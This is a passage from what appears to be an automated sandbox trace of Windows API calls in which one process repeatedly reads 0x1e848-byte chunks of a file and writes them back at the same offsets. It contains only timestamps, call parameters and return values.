hFile=0x220, liDistanceToMove=0x71f6ce0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.971] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.973] GetProcessHeap () returned 0x500000 [0121.973] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.973] GetProcessHeap () returned 0x500000 [0121.973] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.973] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7233d70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.973] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.983] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7233d70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.983] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.984] GetProcessHeap () returned 0x500000 [0121.984] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.984] GetProcessHeap () returned 0x500000 [0121.984] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.984] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7270e00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.984] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.994] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7270e00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.994] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.995] GetProcessHeap () returned 0x500000 [0121.995] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.995] GetProcessHeap () returned 0x500000 [0121.995] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.995] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x72ade90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.995] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.008] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x72ade90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.008] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.009] GetProcessHeap () returned 0x500000 [0122.009] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.009] GetProcessHeap () returned 0x500000 [0122.009] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.009] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x72eaf20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.009] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.029] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x72eaf20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.029] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.030] GetProcessHeap () returned 0x500000 [0122.030] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.030] GetProcessHeap () returned 0x500000 [0122.030] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.030] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7327fb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.030] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.041] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7327fb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.041] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.042] GetProcessHeap () returned 0x500000 [0122.042] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.042] GetProcessHeap () returned 0x500000 [0122.042] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.042] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7365040, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.042] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.054] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7365040, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.054] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.055] GetProcessHeap () returned 0x500000 [0122.055] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.055] GetProcessHeap () returned 0x500000 [0122.055] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.055] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x73a20d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.055] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.065] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x73a20d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.066] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.066] GetProcessHeap () returned 0x500000 [0122.066] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.066] GetProcessHeap () returned 0x500000 [0122.066] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.066] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x73df160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.066] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.078] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x73df160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.078] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.078] GetProcessHeap () returned 0x500000 [0122.079] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.079] GetProcessHeap () returned 0x500000 [0122.079] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.079] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x741c1f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.079] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.100] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x741c1f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.100] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.100] GetProcessHeap () returned 0x500000 [0122.100] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.100] GetProcessHeap () returned 0x500000 [0122.100] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.100] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7459280, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.101] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.110] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7459280, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.110] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.111] GetProcessHeap () returned 0x500000 [0122.111] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.111] GetProcessHeap () returned 0x500000 [0122.111] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.111] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7496310, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.111] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.120] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7496310, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.121] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.121] GetProcessHeap () returned 0x500000 [0122.121] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.121] GetProcessHeap () returned 0x500000 [0122.121] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.121] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x74d33a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.121] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.132] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x74d33a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.132] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.132] GetProcessHeap () returned 0x500000 [0122.132] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.132] GetProcessHeap () returned 0x500000 [0122.132] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.133] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7510430, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.133] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.183] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7510430, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.183] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.184] GetProcessHeap () returned 0x500000 [0122.184] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.184] GetProcessHeap () returned 0x500000 [0122.184] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.184] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x754d4c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.184] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.215] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x754d4c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.215] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.216] GetProcessHeap () returned 0x500000 [0122.216] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.216] GetProcessHeap () returned 0x500000 [0122.216] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.216] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x758a550, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.216] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.437] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x758a550, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.437] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.438] GetProcessHeap () returned 0x500000 [0122.438] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.438] GetProcessHeap () returned 0x500000 [0122.438] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.438] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x75c75e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.438] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.446] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x75c75e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.446] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.446] GetProcessHeap () returned 0x500000 [0122.446] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.446] GetProcessHeap () returned 0x500000 [0122.446] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.446] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7604670, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.446] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.461] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7604670, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.461] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.461] GetProcessHeap () returned 0x500000 [0122.461] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.462] GetProcessHeap () returned 0x500000 [0122.462] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.462] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7641700, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.462] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.470] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7641700, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.470] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.471] GetProcessHeap () returned 0x500000 [0122.471] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.471] GetProcessHeap () returned 0x500000 [0122.471] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.471] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x767e790, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.471] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.479] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x767e790, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.479] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.480] GetProcessHeap () returned 0x500000 [0122.480] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.480] GetProcessHeap () returned 0x500000 [0122.480] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.480] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x76bb820, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.480] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.488] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x76bb820, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.488] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.489] GetProcessHeap () returned 0x500000 [0122.489] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.489] GetProcessHeap () returned 0x500000 [0122.489] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.489] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x76f88b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.489] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.505] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x76f88b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.505] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.506] GetProcessHeap () returned 0x500000 [0122.506] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.506] GetProcessHeap () returned 0x500000 [0122.506] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.506] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7735940, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.506] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0122.515] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7735940, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.515] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0122.515] GetProcessHeap () returned 0x500000 [0122.515] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0122.515] GetProcessHeap () returned 0x500000 [0122.515] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0122.515] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x77729d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.516] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, 